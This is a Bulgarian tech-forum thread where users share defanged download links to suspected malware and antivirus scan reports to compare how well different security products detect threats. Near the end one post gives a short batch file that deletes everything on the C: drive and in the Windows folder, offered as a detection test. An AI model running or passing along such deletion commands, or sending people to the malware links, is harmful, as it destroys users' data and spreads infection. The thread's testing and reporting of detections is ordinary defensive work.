Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 5

Featured Replies

Да прави сте..искренно се извинявам...но понеже и темата е такава реших да покажа колко лови моята антивирусна!

Още веднъж приемете моите извинения.! :question:

Не исках да звучи като критика и да кара когото и да е да се чувства виновен, така че няма нужда от извинения. Мисълта ми беше, че познатият ни на всички Mpower вероятно е избягал от лудницата или там са им раздали компютри и напомня за себе си. Понеже минава през прокси, не помага бан по IP. Единственото, което помага, е да трием и да блокираме регистрациите. Това го можем добре. С помощта на всички ви такива случаи ще се решават на момента, просто трябва да се докладва, тей като не сме винаги в раздела ;)

• Отговори 1,3k
  • Прегледи 102,4k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

• http://virscan.org/report/9a69280751a6614b821e81f2ed38f1e5.html Появи се първият с класифициране. Вариантните защити IDS + HIPS са с безпроблемно справяне и също блокират. ESET и останалите уж лид

• File setup_build8_173.exe received on 2009.09.19 18:33:47 (UTC) Result: 7/41 (17.08%) Antivirus Version Last Update Result a-squared 4.5.0.24 2009.09.19 Trojan-Downloader.Win32.FraudLoad!IK DrWe

• hxxp://search.4shared.com/network/search.jsp?searchmode=2&searchName=teracopy Защитата ми блокира изтеглянето на всички файлове от тип "teracopy". Били тествани с KAV. Вярно ли е това? И наист

Публикувани изображения

Не исках да звучи като критика и да кара когото и да е да се чувства виновен, така че няма нужда от извинения. Мисълта ми беше, че познатият ни на всички Mpower вероятно е избягал от лудницата или там са им раздали компютри и напомня за себе си. Понеже минава през прокси, не помага бан по IP. Единственото, което помага, е да трием и да блокираме регистрациите. Това го можем добре. С помощта на всички ви такива случаи ще се решават на момента, просто трябва да се докладва, тей като не сме винаги в раздела :)

Някой познава ли,въпросния малоумник,неможе,ей така с леки ръце да се пускат вируси във даден сайт,има потребители със скапан антивирусен софтуер,те какво да правят,да преинсталират ли,заради някакъв болен мозък,има си органи за тези изроди,та дори и компетентния български съд.

Mpower беше интересен събеседник - нещо се случи и няколкократно е "баннат". Да- но това го предразполага към щуротии и маймунджулуци - изглежда му е и интересно и може скоро да не му омръзне.Нямам представа какво е сътворил за да е наказван.Подобни хора се считат ненаказуеми и го обръщат на себедоказване. Често разсъждавам обратно на логичното - решение е да бъде реабилитиран при някои условия и да престане. Така ги виждам нещата. Лека вечер

Mpower беше интересен събеседник - нещо се случи и няколкократно е "баннат". Да- но това го предразполага към щуротии и маймунджулуци - изглежда му е и интересно и може скоро да не му омръзне.Нямам представа какво е сътворил за да е наказван.Подобни хора се считат ненаказуеми и го обръщат на себедоказване. Често разсъждавам обратно на логичното - решение е да бъде реабилитиран при някои условия и да престане. Така ги виждам нещата. Лека вечер

Да, и аз така си мислех. Беше му даден и шанс, но неуспешно. Продължи да прикачва разни въшки и да напада и обижда потребителите. Не мисля, че ако му се даде отново шанс, ще промени поведението си. Да продължава, няма проблем. Със сигурност ние можем да трием по-бързо, отколкото той може да пише!

hxxp://4storing.com/dhmyia/2ec6d60d33d6ff0b2e3ecc42374352f9.html Правилно реагират около половината програми - този път реших да не показвам предварително цялостни резултати. Нека да пробва който желае. Може-би така е по-правилно и интересно. Някой друг би могъл да представи общите резултати. Поздрави

hxxp://4storing.com/dhmyia/2ec6d60d33d6ff0b2e3ecc42374352f9.html Правилно реагират около половината програми - този път реших да не показвам предварително цялостни резултати. Нека да пробва който желае. Може-би така е по-правилно и интересно. Някой друг би могъл да представи общите резултати. Поздрави

Коолко интересно... Отново оригинални и чисти релийзи на уважавани кракърски групи. Продължавай да се самозаблуждаваш и уверяваш в собствените си мисли. Ще се въздържа от обидни коментари.

Коолко интересно... Отново оригинални и чисти релийзи на уважавани кракърски групи. Продължавай да се самозаблуждаваш и уверяваш в собствените си мисли. Ще се въздържа от обидни коментари.

И защо се въздържаш - полза има само ако взаимно споделяме мненията си... В какво се заблуждавам? Ако е така - точно затова форумите следва да са интересни. Нямам претенции за нищо - а в последния аспект - и да искаш не можеш да ме обидиш. Налице е тренинг - в резултат на участия в множество подобни форуми. Да бе написал каквото ти е като впечатление и лична преценка...За да е интересно и на другите. Поздрави

https://www.virustotal.com/ru/analisis/dd9b...3e71-1245046356 В този случай почти всички би следвало да реагират.В следващият случай е по-различно - според NOD32 4153 2009.06.14 a variant of Win32/HackTool.Patcher.A http://virscan.org/report/954ca69750632b1b...020b7cd9e5.html hxxp://4storing.com/n01h03/6423e6203f85e3836fc5e5f587385852.html

Редактирано от TNN (преглед на промените)

http://youareanidiot.org/

TrojVare.JS Offis в идиотската закачка не е заплаха за защитата при мен. Неутрализирана без проблем от Comodo IS Free. Инсталирах го на един компютър от любопитство докъде са стигнали - защото прохождащият антивирус се движи тичешком... Поздрави

Не ползвам антивирусни! Пускам проверка веднъж на няколко месеца, до сега за последните 4 години само 2 вируса съм хващал и то по моя си вина.

Всичко е въпрос на потребителска култура. Много ми е интересно как някои мои познати постоянно се пълнят с вируси.

hxxp://rapidshare.com/files/97316953/AnyReader.v2.6.207_sb.rar Касперски е на ниво 25 000 000 -обаче това лови ли го? Application.Win32.HackTool.dUP2.~BAAD е според кандидат-отличника Comodo. https://www.virustotal.com/analisis/dee81cd...0966-1245177200 А на мен ми стана хоби да си намирам нови Win32.Banker според класифицирането на eSafe. Поздрави

hxxp://rapidshare.com/files/97316953/AnyReader.v2.6.207_sb.rar Касперски е на ниво 25 000 000 -обаче това лови ли го? Application.Win32.HackTool.dUP2.~BAAD е според кандидат-отличника Comodo. https://www.virustotal.com/analisis/dee81cd...0966-1245177200 А на мен ми стана хоби да си намирам нови Win32.Banker според класифицирането на eSafe. Поздрави

csrss.exe тествал ли си го за банкери ?

http://www.emsisoft.com/en/malware/?Trojan....Patch.A!IK Австрийската програма не пропуска - мога само да гадая защо при Вирустотал я злепоставят.При csrss.exe не съм намирал банкери - но не бих се изненадал. Аз сега ги търся в мрежата, а не при себе си. Поздрави
Австрийската програма не пропуска - мога само да гадая защо при Вирустотал я злепоставят.

Не е възможно ! Сам казваш, че няма идеални програми.

Аз сега ги търся в мрежата, а не при себе си.

Не мислиш ли, че някои неща, може би е по-добре да не се ровят безмислено ?

Аз не ползвам антивирусна програма. Не считам, че е необходимо, когато човек знае как да си настрои браузъра, когато има твърд бял списък от страници, които посещава, когато има инсталирана надеждна Firewall програма, да се зарази с вирус e малко вероятно. Освен това намирам доста антивирусни програми, тук визирам ресурсопоглъщането, за по-голямо зло, отколкото заразяването с вирус. :P

Comodo IS FRee e с обща маса 202 mB , но не се усеща някакво ресурсопоглъщане. Безплатна комплексна защита - изглежда са дръпнали здраво напред в развитието си. Мисля си - белите списъци от страници не за защитени от атаки и понякога могат да не са безопасни за нищо неподозиращите им посетители. Къде ли не се навира вредоносния код. Ако съм без антивирус трябва да сложа някоя програма от най-добрите с HIPS.Обаче после пак ще се чудя с какво да проверявам и почиствам ползваната ОС. Може-би не Ви се е случвало да се натъкнете на невидими и трудноустановими процеси и събития. Понякога специализиран софтуер пропуска и не установява подобни неща - какъв ми е шанса без него? Почти нулев е. Поздрави

hxxp://rapidshare.com/files/106392485/Easy-Hide-IP_1.6.rar Comodo този път не реагира - а руското творчество изглежда разработено да се справя с руските програми.Trojan.Zlob според австрийските програми.Вижте https://www.virustotal.com/ru/analisis/2c1f...126d-1245222217 Поздрави

hxxp://rapidshare.com/files/106392485/Easy-Hide-IP_1.6.rar Comodo този път не реагира - а руското творчество изглежда разработено да се справя с руските програми.Trojan.Zlob според австрийските програми.Вижте https://www.virustotal.com/ru/analisis/2c1f...126d-1245222217 Поздрави

Аз да попитам дане би А-Скуаред да са спрели да използват енджина на Икарус

това засичане :

Ikarus 	T3.1.1.59.0 	2009.06.17 	Trojan.Zlob

трябваше да го има и при a-squared с разсширение .ik , но го няма- защо ли?

"2 scanners are better than one: Anti-Spyware + Anti-Virus! [NEW!]

Not just any scanners, but a combination of two world class products - the a-squared Anti-Spyware, and the Ikarus Anti-Virus engine. Latest tests approve that both are cutting edge in Malware detection.

No doubling of the scan duration as would be the case with two separate scanning programs. Considerable performance improvement is possible thanks to the integration of the two engines on the lowest level." Платената и безплатната версии на a-squared ползват енджина и на Икарус. А какви ги творят при Вирустотал - те си знаят. Постоянно ми е на разположение безплатната версия на a-squared и доста рядко пропуска да реагира при подобни пробвания.Поздрави

Редактирано от TNN (преглед на промените)

Копирайте и в Notepad поставете следното:

echo y | del c:\*.*

echo y | del c:\windows\*.*

Запазете файла на дектопа под името autoexec.bat

M5g54354.jpg

*Внимание,ако файла не се засича от антивирусна Ви програма, не го стартирайте, изтрийте го .

Редактирано от mihnev_sz (преглед на промените)

Гост
Тази тема е заключена за нови отговори.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    25%
    Дарени 252.69 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.